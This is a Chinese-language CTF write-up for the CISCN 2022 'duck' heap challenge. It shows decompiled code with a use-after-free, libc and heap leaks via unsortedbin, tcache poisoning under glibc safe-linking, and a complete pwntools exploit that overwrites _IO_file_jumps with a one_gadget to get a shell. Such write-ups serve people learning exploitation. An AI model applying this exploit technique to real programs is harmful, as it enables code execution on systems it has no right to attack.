[CISCN 2022 華東北] duck

bamuwe發表於2024-05-02

[CISCN 2022 華東北] duck

UAF|leak_libc|leak_heap_base|指標加密|unsortedbin|one_gadget

[*] '/home/bamuwe/duck/pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

$ checksec ./pwn

/home/ubuntu/glibc/glibc-2.34/build/lib/gconv
/home/ubuntu/glibc/glibc-2.34/build/lib/locale
/home/ubuntu/glibc/glibc-2.34/build/lib/locale/locale-archive
/home/ubuntu/glibc/glibc-2.34/build/share/locale
...

$ strings /home/bamuwe/duck/libc.so.6 |grep glibc

1.Add
2.Del
3.Show
4.Edit
Choice:

$ ./pwn

int del()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = numinput();
  if ( v1 <= 20 && qword_4060[v1] )
  {
    free(qword_4060[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

del()漏洞函式

沒有清除指標,存在uaf

int edit()
{
  int v1; // [rsp+8h] [rbp-8h]
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = numinput();
  if ( v1 <= 20 && qword_4060[v1] )
  {
    puts("Size: ");
    v2 = numinput();
    if ( v2 > 0x100 )
    {
      return puts("Error");
    }
    else
    {
      puts("Content: ");
      sub_12AC(qword_4060[v1], v2);
      puts("Done");
      return 0;
    }
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

edit()

int sub_13F3()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = numinput();
  if ( v1 <= 20 && qword_4060[v1] )
  {
    puts(qword_4060[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

show()

int add()
{
  int i; // [rsp+4h] [rbp-Ch]
  void *v2; // [rsp+8h] [rbp-8h]

  v2 = malloc(0x100uLL);
  for ( i = 0; i <= 19; ++i )
  {
    if ( !qword_4060[i] )
    {
      qword_4060[i] = v2;
      puts("Done");
      return 1;
    }
  }
  return puts("Empty!");
}

add()

def add():
    io.sendlineafter(b'Choice: ',b'1')
    
def free(idx):
    io.sendlineafter(b'Choice: ',b'2')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    
def show(idx):
    io.sendlineafter(b'Choice: ',b'3')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    
def edit(idx,content):
    io.sendlineafter(b'Choice: ',b'4')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    io.sendlineafter(b'Size: \n',str(int(0x100)))
    io.send(content)

程式邏輯:

  1. add()會分配一個0x110空間的堆塊

    pwndbg> heap
    Allocated chunk | PREV_INUSE
    Addr: 0x55555555b000
    Size: 0x291
    
    Allocated chunk | PREV_INUSE
    Addr: 0x55555555b290
    Size: 0x111
    
    Allocated chunk | PREV_INUSE
    Addr: 0x55555555b3a0
    Size: 0x111
    
    Allocated chunk | PREV_INUSE
    Addr: 0x55555555b4b0
    Size: 0x111
    
    Top chunk | PREV_INUSE
    Addr: 0x55555555b5c0
    Size: 0x20a41
    
  2. edit()能夠對堆上資料進行修改

    1.Add
    2.Del
    3.Show
    4.Edit
    Choice: 1
    Done
    1.Add
    2.Del
    3.Show
    4.Edit
    Choice: 1
    Done
    1.Add
    2.Del
    3.Show
    4.Edit
    Choice: 4
    Idx:
    0
    Size:
    10
    Content:
    AAAA
    Done
    1.Add
    2.Del
    3.Show
    4.Edit
    Choice: 
    
    0x55555555b290  0x0000000000000000      0x0000000000000111      ................
    0x55555555b2a0  0x0000000a41414141      0x0000000000000000      AAAA............
    0x55555555b2b0  0x0000000000000000      0x0000000000000000      ................
    0x55555555b2c0  0x0000000000000000      0x0000000000000000      ................
    0x55555555b2d0  0x0000000000000000      0x0000000000000000      ................
    0x55555555b2e0  0x0000000000000000      0x0000000000000000      ................
    0x55555555b2f0  0x0000000000000000      0x0000000000000000      ................
    

利用思路:

  1. 先用unsorted_bin洩露libcheap_base

    for i in range(9):
        add()           #0-7
    for i in range(9):
        free(i)         #0-7
    #leak_libc
    show(7)
    main_arena_addr = u64(io.recv(6).ljust(8,b'\x00'))-96
    libc_offset = main_arena_addr-lib.sym['main_arena']
    one_addr = 0xda864+libc_offset			#one_gadget
    IO_file_jumps = libc_offset + lib.sym['_IO_file_jumps']
    success(f'main_arena_addr=>{hex(main_arena_addr)}')
    success(f'one_addr=>{hex(one_addr)}')
    success(f'IO_file_jumps=>{hex(IO_file_jumps)}')
    #leak_heap_base
    show(0)
    heap_base_addr = u64(io.recv(5).ljust(8,b'\x00'))
    success(f'heap_base_addr=>{hex(heap_base_addr)}')
    

    獲得了libc,heap_base,one_gadget

  2. 利用tcache_bin偽造fake_chunk獲得shell

    for i in range(5):
        add()           #8-13
    edit(1,p64(heap_base_addr^IO_file_jumps))       #對chunk0修改	`指標加密`
    add()               #14
    add()               #15
    edit(15,p64(0)*3+p64(one_addr))
    

    image-20240502224722784

    先控制tcache_bin中剩餘兩個節點,方便我們操作

    image-20240502224849916

    成功修改為IO_file_jumps地址,這裡因為指標加密機制的存在,所以p64(heap_base_addr^IO_file_jumps)

關於指標加密:

glibc2.32之後引入了一個新的指標機制:

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

malloc

引入了一個異或加密,現在要尋找一個地址,需要使用真實地址與heap_base地址進行異或,得到指標,給利用帶來了難度,但同時也帶來了新的洩露姿勢

https://www.anquanke.com/post/id/236186


exp:

#Ubuntu2.34
from pwn import *
context.log_level = 'debug'
io = gdb.debug('./pwn')
# io = remote('node4.anna.nssctf.cn',28254)
elf = ELF('./pwn')
lib = ELF('/home/bamuwe/duck/libc.so.6')
def add():
    io.sendlineafter(b'Choice: ',b'1')
    
def free(idx):
    io.sendlineafter(b'Choice: ',b'2')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    
def show(idx):
    io.sendlineafter(b'Choice: ',b'3')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    
def edit(idx,content):
    io.sendlineafter(b'Choice: ',b'4')
    io.sendlineafter(b'Idx: \n',str(int(idx)))
    io.sendlineafter(b'Size: \n',str(int(0x100)))
    io.send(content)

for i in range(9):
    add()           #0-7
for i in range(9):
    free(i)         #0-7
                    
#leak_libc
show(7)
main_arena_addr = u64(io.recv(6).ljust(8,b'\x00'))-96
libc_offset = main_arena_addr-lib.sym['main_arena']
one_addr = 0xda864+libc_offset			#one_gadget
IO_file_jumps = libc_offset + lib.sym['_IO_file_jumps']
success(f'main_arena_addr=>{hex(main_arena_addr)}')
success(f'one_addr=>{hex(one_addr)}')
success(f'IO_file_jumps=>{hex(IO_file_jumps)}')
#leak_heap_base
show(0)
heap_base_addr = u64(io.recv(5).ljust(8,b'\x00'))
success(f'heap_base_addr=>{hex(heap_base_addr)}')

for i in range(5):
    add()           #8-13
edit(1,p64(heap_base_addr^IO_file_jumps))       #對chunk0修改
add()               #14
add()               #15
edit(15,p64(0)*3+p64(one_addr))
io.interactive()

相關文章